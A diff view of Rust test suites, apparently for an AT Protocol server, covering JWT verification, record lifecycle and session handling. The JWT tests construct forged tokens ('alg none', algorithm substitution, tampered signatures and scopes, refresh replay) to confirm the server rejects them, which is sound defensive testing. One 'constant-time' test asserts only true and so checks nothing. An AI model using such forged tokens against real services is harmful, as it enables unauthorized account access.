let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap());
34
format!("{}.{}.", header_b64, claims_b64)
35
}
36
#[test]
37
fn test_jwt_security_forged_signature_rejected() {
38
let key_bytes = generate_user_key();
···
46
let err_msg = result.err().unwrap().to_string();
47
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
48
}
49
#[test]
50
fn test_jwt_security_modified_payload_rejected() {
51
let key_bytes = generate_user_key();
···
60
let result = verify_access_token(&modified_token, &key_bytes);
61
assert!(result.is_err(), "Modified payload must be rejected");
62
}
63
#[test]
64
fn test_jwt_security_algorithm_none_attack_rejected() {
65
let key_bytes = generate_user_key();
···
81
let result = verify_access_token(&malicious_token, &key_bytes);
82
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
83
}
84
#[test]
85
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
86
let key_bytes = generate_user_key();
···
111
let result = verify_access_token(&malicious_token, &key_bytes);
112
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
113
}
114
#[test]
115
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
116
let key_bytes = generate_user_key();
···
135
let result = verify_access_token(&malicious_token, &key_bytes);
136
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
137
}
138
#[test]
139
fn test_jwt_security_algorithm_substitution_es256_rejected() {
140
let key_bytes = generate_user_key();
···
159
let result = verify_access_token(&malicious_token, &key_bytes);
160
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
161
}
162
#[test]
163
fn test_jwt_security_token_type_confusion_refresh_as_access() {
164
let key_bytes = generate_user_key();
···
169
let err_msg = result.err().unwrap().to_string();
170
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
171
}
172
#[test]
173
fn test_jwt_security_token_type_confusion_access_as_refresh() {
174
let key_bytes = generate_user_key();
···
179
let err_msg = result.err().unwrap().to_string();
180
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
}
182
#[test]
183
fn test_jwt_security_token_type_confusion_service_as_access() {
184
let key_bytes = generate_user_key();
···
188
let result = verify_access_token(&service_token, &key_bytes);
189
assert!(result.is_err(), "Service token must not be accepted as access token");
190
}
191
#[test]
192
fn test_jwt_security_scope_manipulation_attack() {
193
let key_bytes = generate_user_key();
···
211
let err_msg = result.err().unwrap().to_string();
212
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
213
}
214
#[test]
215
fn test_jwt_security_empty_scope_rejected() {
216
let key_bytes = generate_user_key();
···
232
let result = verify_access_token(&token, &key_bytes);
233
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
234
}
235
#[test]
236
fn test_jwt_security_missing_scope_rejected() {
237
let key_bytes = generate_user_key();
···
252
let result = verify_access_token(&token, &key_bytes);
253
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
254
}
255
#[test]
256
fn test_jwt_security_expired_token_rejected() {
257
let key_bytes = generate_user_key();
···
275
let err_msg = result.err().unwrap().to_string();
276
assert!(err_msg.contains("expired"), "Error: {}", err_msg);
277
}
278
#[test]
279
fn test_jwt_security_future_iat_accepted() {
280
let key_bytes = generate_user_key();
···
296
let result = verify_access_token(&token, &key_bytes);
297
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
298
}
299
#[test]
300
fn test_jwt_security_cross_user_key_attack() {
301
let key_bytes_user1 = generate_user_key();
···
305
let result = verify_access_token(&token, &key_bytes_user2);
306
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
307
}
308
#[test]
309
fn test_jwt_security_signature_truncation_rejected() {
310
let key_bytes = generate_user_key();
···
317
let result = verify_access_token(&truncated_token, &key_bytes);
318
assert!(result.is_err(), "Truncated signature must be rejected");
319
}
320
#[test]
321
fn test_jwt_security_signature_extension_rejected() {
322
let key_bytes = generate_user_key();
···
330
let result = verify_access_token(&extended_token, &key_bytes);
331
assert!(result.is_err(), "Extended signature must be rejected");
332
}
333
#[test]
334
fn test_jwt_security_malformed_tokens_rejected() {
335
let key_bytes = generate_user_key();
···
352
if token.len() > 40 { &token[..40] } else { token });
353
}
354
}
355
#[test]
356
fn test_jwt_security_missing_required_claims_rejected() {
357
let key_bytes = generate_user_key();
···
389
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
390
}
391
}
392
#[test]
393
fn test_jwt_security_invalid_header_json_rejected() {
394
let key_bytes = generate_user_key();
···
399
let result = verify_access_token(&malicious_token, &key_bytes);
400
assert!(result.is_err(), "Invalid header JSON must be rejected");
401
}
402
#[test]
403
fn test_jwt_security_invalid_claims_json_rejected() {
404
let key_bytes = generate_user_key();
···
409
let result = verify_access_token(&malicious_token, &key_bytes);
410
assert!(result.is_err(), "Invalid claims JSON must be rejected");
411
}
412
#[test]
413
fn test_jwt_security_header_injection_attack() {
414
let key_bytes = generate_user_key();
···
432
let result = verify_access_token(&token, &key_bytes);
433
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
434
}
435
#[test]
436
fn test_jwt_security_claims_type_confusion() {
437
let key_bytes = generate_user_key();
···
452
let result = verify_access_token(&token, &key_bytes);
453
assert!(result.is_err(), "Claims with wrong types must be rejected");
454
}
455
#[test]
456
fn test_jwt_security_unicode_injection_in_claims() {
457
let key_bytes = generate_user_key();
···
475
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
476
}
477
}
478
#[test]
479
fn test_jwt_security_signature_verification_is_constant_time() {
480
let key_bytes = generate_user_key();
···
491
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
492
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
493
}
494
#[test]
495
fn test_jwt_security_valid_scopes_accepted() {
496
let key_bytes = generate_user_key();
···
519
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
520
}
521
}
522
#[test]
523
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
524
let key_bytes = generate_user_key();
···
540
let result = verify_access_token(&token, &key_bytes);
541
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
542
}
543
#[test]
544
fn test_jwt_security_get_did_extraction_safe() {
545
let key_bytes = generate_user_key();
···
557
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
558
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
559
}
560
#[test]
561
fn test_jwt_security_get_jti_extraction_safe() {
562
let key_bytes = generate_user_key();
···
572
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
573
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
574
}
575
#[test]
576
fn test_jwt_security_key_from_invalid_bytes_rejected() {
577
let invalid_keys: Vec<&[u8]> = vec![
···
591
}
592
}
593
}
594
#[test]
595
fn test_jwt_security_boundary_exp_values() {
596
let key_bytes = generate_user_key();
···
624
let result2 = verify_access_token(&token2, &key_bytes);
625
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
626
}
627
#[test]
628
fn test_jwt_security_very_long_exp_handled() {
629
let key_bytes = generate_user_key();
···
644
let token = create_custom_jwt(&header, &claims, &key_bytes);
645
let _result = verify_access_token(&token, &key_bytes);
646
}
647
#[test]
648
fn test_jwt_security_negative_timestamps_handled() {
649
let key_bytes = generate_user_key();
···
664
let token = create_custom_jwt(&header, &claims, &key_bytes);
665
let _result = verify_access_token(&token, &key_bytes);
666
}
667
#[tokio::test]
668
async fn test_jwt_security_server_rejects_forged_session_token() {
669
let url = base_url().await;
···
679
.unwrap();
680
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
681
}
682
#[tokio::test]
683
async fn test_jwt_security_server_rejects_expired_token() {
684
let url = base_url().await;
···
698
.unwrap();
699
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
700
}
701
#[tokio::test]
702
async fn test_jwt_security_server_rejects_tampered_did() {
703
let url = base_url().await;
···
718
.unwrap();
719
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
720
}
721
#[tokio::test]
722
async fn test_jwt_security_refresh_token_replay_protection() {
723
let url = base_url().await;
···
780
.unwrap();
781
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
782
}
783
#[tokio::test]
784
async fn test_jwt_security_authorization_header_formats() {
785
let url = base_url().await;
···
821
.unwrap();
822
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
823
}
824
#[tokio::test]
825
async fn test_jwt_security_deleted_session_rejected() {
826
let url = base_url().await;
···
848
.unwrap();
849
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
850
}
851
#[tokio::test]
852
async fn test_jwt_security_deactivated_account_rejected() {
853
let url = base_url().await;
···
15
use reqwest::StatusCode;
16
use serde_json::{json, Value};
17
use sha2::{Digest, Sha256};
18
+
19
fn generate_user_key() -> Vec<u8> {
20
let secret_key = SecretKey::random(&mut OsRng);
21
secret_key.to_bytes().to_vec()
22
}
23
+
24
fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String {
25
let signing_key = SigningKey::from_slice(key_bytes).expect("valid key");
26
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
···
30
let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes());
31
format!("{}.{}", message, signature_b64)
32
}
33
+
34
fn create_unsigned_jwt(header: &Value, claims: &Value) -> String {
35
let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap());
36
let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap());
37
format!("{}.{}.", header_b64, claims_b64)
38
}
39
+
40
#[test]
41
fn test_jwt_security_forged_signature_rejected() {
42
let key_bytes = generate_user_key();
···
50
let err_msg = result.err().unwrap().to_string();
51
assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg);
52
}
53
+
54
#[test]
55
fn test_jwt_security_modified_payload_rejected() {
56
let key_bytes = generate_user_key();
···
65
let result = verify_access_token(&modified_token, &key_bytes);
66
assert!(result.is_err(), "Modified payload must be rejected");
67
}
68
+
69
#[test]
70
fn test_jwt_security_algorithm_none_attack_rejected() {
71
let key_bytes = generate_user_key();
···
87
let result = verify_access_token(&malicious_token, &key_bytes);
88
assert!(result.is_err(), "Algorithm 'none' attack must be rejected");
89
}
90
+
91
#[test]
92
fn test_jwt_security_algorithm_substitution_hs256_rejected() {
93
let key_bytes = generate_user_key();
···
118
let result = verify_access_token(&malicious_token, &key_bytes);
119
assert!(result.is_err(), "HS256 algorithm substitution must be rejected");
120
}
121
+
122
#[test]
123
fn test_jwt_security_algorithm_substitution_rs256_rejected() {
124
let key_bytes = generate_user_key();
···
143
let result = verify_access_token(&malicious_token, &key_bytes);
144
assert!(result.is_err(), "RS256 algorithm substitution must be rejected");
145
}
146
+
147
#[test]
148
fn test_jwt_security_algorithm_substitution_es256_rejected() {
149
let key_bytes = generate_user_key();
···
168
let result = verify_access_token(&malicious_token, &key_bytes);
169
assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)");
170
}
171
+
172
#[test]
173
fn test_jwt_security_token_type_confusion_refresh_as_access() {
174
let key_bytes = generate_user_key();
···
179
let err_msg = result.err().unwrap().to_string();
180
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
181
}
182
+
183
#[test]
184
fn test_jwt_security_token_type_confusion_access_as_refresh() {
185
let key_bytes = generate_user_key();
···
190
let err_msg = result.err().unwrap().to_string();
191
assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg);
192
}
193
+
194
#[test]
195
fn test_jwt_security_token_type_confusion_service_as_access() {
196
let key_bytes = generate_user_key();
···
200
let result = verify_access_token(&service_token, &key_bytes);
201
assert!(result.is_err(), "Service token must not be accepted as access token");
202
}
203
+
204
#[test]
205
fn test_jwt_security_scope_manipulation_attack() {
206
let key_bytes = generate_user_key();
···
224
let err_msg = result.err().unwrap().to_string();
225
assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg);
226
}
227
+
228
#[test]
229
fn test_jwt_security_empty_scope_rejected() {
230
let key_bytes = generate_user_key();
···
246
let result = verify_access_token(&token, &key_bytes);
247
assert!(result.is_err(), "Empty scope must be rejected for access tokens");
248
}
249
+
250
#[test]
251
fn test_jwt_security_missing_scope_rejected() {
252
let key_bytes = generate_user_key();
···
267
let result = verify_access_token(&token, &key_bytes);
268
assert!(result.is_err(), "Missing scope must be rejected for access tokens");
269
}
270
+
271
#[test]
272
fn test_jwt_security_expired_token_rejected() {
273
let key_bytes = generate_user_key();
···
291
let err_msg = result.err().unwrap().to_string();
292
assert!(err_msg.contains("expired"), "Error: {}", err_msg);
293
}
294
+
295
#[test]
296
fn test_jwt_security_future_iat_accepted() {
297
let key_bytes = generate_user_key();
···
313
let result = verify_access_token(&token, &key_bytes);
314
assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance");
315
}
316
+
317
#[test]
318
fn test_jwt_security_cross_user_key_attack() {
319
let key_bytes_user1 = generate_user_key();
···
323
let result = verify_access_token(&token, &key_bytes_user2);
324
assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key");
325
}
326
+
327
#[test]
328
fn test_jwt_security_signature_truncation_rejected() {
329
let key_bytes = generate_user_key();
···
336
let result = verify_access_token(&truncated_token, &key_bytes);
337
assert!(result.is_err(), "Truncated signature must be rejected");
338
}
339
+
340
#[test]
341
fn test_jwt_security_signature_extension_rejected() {
342
let key_bytes = generate_user_key();
···
350
let result = verify_access_token(&extended_token, &key_bytes);
351
assert!(result.is_err(), "Extended signature must be rejected");
352
}
353
+
354
#[test]
355
fn test_jwt_security_malformed_tokens_rejected() {
356
let key_bytes = generate_user_key();
···
373
if token.len() > 40 { &token[..40] } else { token });
374
}
375
}
376
+
377
#[test]
378
fn test_jwt_security_missing_required_claims_rejected() {
379
let key_bytes = generate_user_key();
···
411
assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim);
412
}
413
}
414
+
415
#[test]
416
fn test_jwt_security_invalid_header_json_rejected() {
417
let key_bytes = generate_user_key();
···
422
let result = verify_access_token(&malicious_token, &key_bytes);
423
assert!(result.is_err(), "Invalid header JSON must be rejected");
424
}
425
+
426
#[test]
427
fn test_jwt_security_invalid_claims_json_rejected() {
428
let key_bytes = generate_user_key();
···
433
let result = verify_access_token(&malicious_token, &key_bytes);
434
assert!(result.is_err(), "Invalid claims JSON must be rejected");
435
}
436
+
437
#[test]
438
fn test_jwt_security_header_injection_attack() {
439
let key_bytes = generate_user_key();
···
457
let result = verify_access_token(&token, &key_bytes);
458
assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)");
459
}
460
+
461
#[test]
462
fn test_jwt_security_claims_type_confusion() {
463
let key_bytes = generate_user_key();
···
478
let result = verify_access_token(&token, &key_bytes);
479
assert!(result.is_err(), "Claims with wrong types must be rejected");
480
}
481
+
482
#[test]
483
fn test_jwt_security_unicode_injection_in_claims() {
484
let key_bytes = generate_user_key();
···
502
assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected");
503
}
504
}
505
+
506
#[test]
507
fn test_jwt_security_signature_verification_is_constant_time() {
508
let key_bytes = generate_user_key();
···
519
let _result2 = verify_access_token(&completely_invalid_token, &key_bytes);
520
assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)");
521
}
522
+
523
#[test]
524
fn test_jwt_security_valid_scopes_accepted() {
525
let key_bytes = generate_user_key();
···
548
assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope);
549
}
550
}
551
+
552
#[test]
553
fn test_jwt_security_refresh_token_scope_rejected_as_access() {
554
let key_bytes = generate_user_key();
···
570
let result = verify_access_token(&token, &key_bytes);
571
assert!(result.is_err(), "Refresh scope with access token type must be rejected");
572
}
573
+
574
#[test]
575
fn test_jwt_security_get_did_extraction_safe() {
576
let key_bytes = generate_user_key();
···
588
let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe");
589
assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)");
590
}
591
+
592
#[test]
593
fn test_jwt_security_get_jti_extraction_safe() {
594
let key_bytes = generate_user_key();
···
604
let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig);
605
assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error");
606
}
607
+
608
#[test]
609
fn test_jwt_security_key_from_invalid_bytes_rejected() {
610
let invalid_keys: Vec<&[u8]> = vec![
···
624
}
625
}
626
}
627
+
628
#[test]
629
fn test_jwt_security_boundary_exp_values() {
630
let key_bytes = generate_user_key();
···
658
let result2 = verify_access_token(&token2, &key_bytes);
659
assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable");
660
}
661
+
662
#[test]
663
fn test_jwt_security_very_long_exp_handled() {
664
let key_bytes = generate_user_key();
···
679
let token = create_custom_jwt(&header, &claims, &key_bytes);
680
let _result = verify_access_token(&token, &key_bytes);
681
}
682
+
683
#[test]
684
fn test_jwt_security_negative_timestamps_handled() {
685
let key_bytes = generate_user_key();
···
700
let token = create_custom_jwt(&header, &claims, &key_bytes);
701
let _result = verify_access_token(&token, &key_bytes);
702
}
703
+
704
#[tokio::test]
705
async fn test_jwt_security_server_rejects_forged_session_token() {
706
let url = base_url().await;
···
716
.unwrap();
717
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected");
718
}
719
+
720
#[tokio::test]
721
async fn test_jwt_security_server_rejects_expired_token() {
722
let url = base_url().await;
···
736
.unwrap();
737
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected");
738
}
739
+
740
#[tokio::test]
741
async fn test_jwt_security_server_rejects_tampered_did() {
742
let url = base_url().await;
···
757
.unwrap();
758
assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected");
759
}
760
+
761
#[tokio::test]
762
async fn test_jwt_security_refresh_token_replay_protection() {
763
let url = base_url().await;
···
820
.unwrap();
821
assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected");
822
}
823
+
824
#[tokio::test]
825
async fn test_jwt_security_authorization_header_formats() {
826
let url = base_url().await;
···
862
.unwrap();
863
assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected");
864
}
865
+
866
#[tokio::test]
867
async fn test_jwt_security_deleted_session_rejected() {
868
let url = base_url().await;
···
890
.unwrap();
891
assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout");
892
}
893
+
894
#[tokio::test]
895
async fn test_jwt_security_deactivated_account_rejected() {
896
let url = base_url().await;
+23
tests/lifecycle_record.rs
+23
tests/lifecycle_record.rs
···
6
use reqwest::{StatusCode, header};
7
use serde_json::{Value, json};
8
use std::time::Duration;
9
#[tokio::test]
10
async fn test_post_crud_lifecycle() {
11
let client = client();
···
155
"Record was found, but it should be deleted"
156
);
157
}
158
#[tokio::test]
159
async fn test_record_update_conflict_lifecycle() {
160
let client = client();
···
280
"v3 (good) update failed"
281
);
282
}
283
#[tokio::test]
284
async fn test_profile_lifecycle() {
285
let client = client();
···
362
let updated_body: Value = get_updated_res.json().await.unwrap();
363
assert_eq!(updated_body["value"]["displayName"], "Updated User");
364
}
365
#[tokio::test]
366
async fn test_reply_thread_lifecycle() {
367
let client = client();
···
457
.expect("Failed to create nested reply");
458
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
459
}
460
#[tokio::test]
461
async fn test_blob_in_record_lifecycle() {
462
let client = client();
···
514
let profile: Value = get_res.json().await.unwrap();
515
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
516
}
517
#[tokio::test]
518
async fn test_authorization_cannot_modify_other_repo() {
519
let client = client();
···
545
res.status()
546
);
547
}
548
#[tokio::test]
549
async fn test_authorization_cannot_delete_other_record() {
550
let client = client();
···
587
.expect("Failed to verify record exists");
588
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
589
}
590
#[tokio::test]
591
async fn test_apply_writes_batch_lifecycle() {
592
let client = client();
···
747
"Batch-deleted post should be gone"
748
);
749
}
750
async fn create_post_with_rkey(
751
client: &reqwest::Client,
752
did: &str,
···
781
body["cid"].as_str().unwrap().to_string(),
782
)
783
}
784
#[tokio::test]
785
async fn test_list_records_default_order() {
786
let client = client();
···
812
.collect();
813
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
814
}
815
#[tokio::test]
816
async fn test_list_records_reverse_true() {
817
let client = client();
···
843
.collect();
844
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
845
}
846
#[tokio::test]
847
async fn test_list_records_cursor_pagination() {
848
let client = client();
···
895
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
896
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
897
}
898
#[tokio::test]
899
async fn test_list_records_rkey_start() {
900
let client = client();
···
928
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
929
}
930
}
931
#[tokio::test]
932
async fn test_list_records_rkey_end() {
933
let client = client();
···
961
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
962
}
963
}
964
#[tokio::test]
965
async fn test_list_records_rkey_range() {
966
let client = client();
···
997
}
998
assert!(!rkeys.is_empty(), "Should have at least some records in range");
999
}
1000
#[tokio::test]
1001
async fn test_list_records_limit_clamping_max() {
1002
let client = client();
···
1022
let records = body["records"].as_array().unwrap();
1023
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1024
}
1025
#[tokio::test]
1026
async fn test_list_records_limit_clamping_min() {
1027
let client = client();
···
1045
let records = body["records"].as_array().unwrap();
1046
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1047
}
1048
#[tokio::test]
1049
async fn test_list_records_empty_collection() {
1050
let client = client();
···
1067
assert!(records.is_empty(), "Empty collection should return empty array");
1068
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1069
}
1070
#[tokio::test]
1071
async fn test_list_records_exact_limit() {
1072
let client = client();
···
1092
let records = body["records"].as_array().unwrap();
1093
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1094
}
1095
#[tokio::test]
1096
async fn test_list_records_cursor_exhaustion() {
1097
let client = client();
···
1117
let records = body["records"].as_array().unwrap();
1118
assert_eq!(records.len(), 3);
1119
}
1120
#[tokio::test]
1121
async fn test_list_records_repo_not_found() {
1122
let client = client();
···
1134
.expect("Failed to list records");
1135
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1136
}
1137
#[tokio::test]
1138
async fn test_list_records_includes_cid() {
1139
let client = client();
···
1162
assert!(cid.starts_with("bafy"), "CID should be valid");
1163
}
1164
}
1165
#[tokio::test]
1166
async fn test_list_records_cursor_with_reverse() {
1167
let client = client();
···
6
use reqwest::{StatusCode, header};
7
use serde_json::{Value, json};
8
use std::time::Duration;
9
+
10
#[tokio::test]
11
async fn test_post_crud_lifecycle() {
12
let client = client();
···
156
"Record was found, but it should be deleted"
157
);
158
}
159
+
160
#[tokio::test]
161
async fn test_record_update_conflict_lifecycle() {
162
let client = client();
···
282
"v3 (good) update failed"
283
);
284
}
285
+
286
#[tokio::test]
287
async fn test_profile_lifecycle() {
288
let client = client();
···
365
let updated_body: Value = get_updated_res.json().await.unwrap();
366
assert_eq!(updated_body["value"]["displayName"], "Updated User");
367
}
368
+
369
#[tokio::test]
370
async fn test_reply_thread_lifecycle() {
371
let client = client();
···
461
.expect("Failed to create nested reply");
462
assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply");
463
}
464
+
465
#[tokio::test]
466
async fn test_blob_in_record_lifecycle() {
467
let client = client();
···
519
let profile: Value = get_res.json().await.unwrap();
520
assert!(profile["value"]["avatar"]["ref"]["$link"].is_string());
521
}
522
+
523
#[tokio::test]
524
async fn test_authorization_cannot_modify_other_repo() {
525
let client = client();
···
551
res.status()
552
);
553
}
554
+
555
#[tokio::test]
556
async fn test_authorization_cannot_delete_other_record() {
557
let client = client();
···
594
.expect("Failed to verify record exists");
595
assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist");
596
}
597
+
598
#[tokio::test]
599
async fn test_apply_writes_batch_lifecycle() {
600
let client = client();
···
755
"Batch-deleted post should be gone"
756
);
757
}
758
+
759
async fn create_post_with_rkey(
760
client: &reqwest::Client,
761
did: &str,
···
790
body["cid"].as_str().unwrap().to_string(),
791
)
792
}
793
+
794
#[tokio::test]
795
async fn test_list_records_default_order() {
796
let client = client();
···
822
.collect();
823
assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)");
824
}
825
+
826
#[tokio::test]
827
async fn test_list_records_reverse_true() {
828
let client = client();
···
854
.collect();
855
assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)");
856
}
857
+
858
#[tokio::test]
859
async fn test_list_records_cursor_pagination() {
860
let client = client();
···
907
let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect();
908
assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records");
909
}
910
+
911
#[tokio::test]
912
async fn test_list_records_rkey_start() {
913
let client = client();
···
941
assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start");
942
}
943
}
944
+
945
#[tokio::test]
946
async fn test_list_records_rkey_end() {
947
let client = client();
···
975
assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end");
976
}
977
}
978
+
979
#[tokio::test]
980
async fn test_list_records_rkey_range() {
981
let client = client();
···
1012
}
1013
assert!(!rkeys.is_empty(), "Should have at least some records in range");
1014
}
1015
+
1016
#[tokio::test]
1017
async fn test_list_records_limit_clamping_max() {
1018
let client = client();
···
1038
let records = body["records"].as_array().unwrap();
1039
assert!(records.len() <= 100, "Limit should be clamped to max 100");
1040
}
1041
+
1042
#[tokio::test]
1043
async fn test_list_records_limit_clamping_min() {
1044
let client = client();
···
1062
let records = body["records"].as_array().unwrap();
1063
assert!(records.len() >= 1, "Limit should be clamped to min 1");
1064
}
1065
+
1066
#[tokio::test]
1067
async fn test_list_records_empty_collection() {
1068
let client = client();
···
1085
assert!(records.is_empty(), "Empty collection should return empty array");
1086
assert!(body["cursor"].is_null(), "Empty collection should have no cursor");
1087
}
1088
+
1089
#[tokio::test]
1090
async fn test_list_records_exact_limit() {
1091
let client = client();
···
1111
let records = body["records"].as_array().unwrap();
1112
assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5");
1113
}
1114
+
1115
#[tokio::test]
1116
async fn test_list_records_cursor_exhaustion() {
1117
let client = client();
···
1137
let records = body["records"].as_array().unwrap();
1138
assert_eq!(records.len(), 3);
1139
}
1140
+
1141
#[tokio::test]
1142
async fn test_list_records_repo_not_found() {
1143
let client = client();
···
1155
.expect("Failed to list records");
1156
assert_eq!(res.status(), StatusCode::NOT_FOUND);
1157
}
1158
+
1159
#[tokio::test]
1160
async fn test_list_records_includes_cid() {
1161
let client = client();
···
1184
assert!(cid.starts_with("bafy"), "CID should be valid");
1185
}
1186
}
1187
+
1188
#[tokio::test]
1189
async fn test_list_records_cursor_with_reverse() {
1190
let client = client();
+7
tests/lifecycle_session.rs
+7
tests/lifecycle_session.rs
···
5
use chrono::Utc;
6
use reqwest::StatusCode;
7
use serde_json::{Value, json};
8
#[tokio::test]
9
async fn test_session_lifecycle_wrong_password() {
10
let client = client();
···
28
res.status()
29
);
30
}
31
#[tokio::test]
32
async fn test_session_lifecycle_multiple_sessions() {
33
let client = client();
···
103
.expect("Failed getSession 2");
104
assert_eq!(get2.status(), StatusCode::OK);
105
}
106
#[tokio::test]
107
async fn test_session_lifecycle_refresh_invalidates_old() {
108
let client = client();
···
169
"Old refresh token should be invalid after use"
170
);
171
}
172
#[tokio::test]
173
async fn test_app_password_lifecycle() {
174
let client = client();
···
275
let passwords_after = list_after["passwords"].as_array().unwrap();
276
assert_eq!(passwords_after.len(), 0, "No app passwords should remain");
277
}
278
#[tokio::test]
279
async fn test_account_deactivation_lifecycle() {
280
let client = client();
···
362
let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await;
363
assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation");
364
}
365
#[tokio::test]
366
async fn test_service_auth_lifecycle() {
367
let client = client();
···
393
assert_eq!(claims["aud"], "did:web:api.bsky.app");
394
assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob");
395
}
396
#[tokio::test]
397
async fn test_request_account_delete() {
398
let client = client();
···
5
use chrono::Utc;
6
use reqwest::StatusCode;
7
use serde_json::{Value, json};
8
+
9
#[tokio::test]
10
async fn test_session_lifecycle_wrong_password() {
11
let client = client();
···
29
res.status()
30
);
31
}
32
+
33
#[tokio::test]
34
async fn test_session_lifecycle_multiple_sessions() {
35
let client = client();
···
105
.expect("Failed getSession 2");
106
assert_eq!(get2.status(), StatusCode::OK);
107
}
108
+
109
#[tokio::test]
110
async fn test_session_lifecycle_refresh_invalidates_old() {
111
let client = client();
···
172
"Old refresh token should be invalid after use"
173
);
174
}
175
+
176
#[tokio::test]
177
async fn test_app_password_lifecycle() {
178
let client = client();
···
279
let passwords_after = list_after["passwords"].as_array().unwrap();
280
assert_eq!(passwords_after.len(), 0, "No app passwords should remain");
281
}
282
+
283
#[tokio::test]
284
async fn test_account_deactivation_lifecycle() {
285
let client = client();
···
367
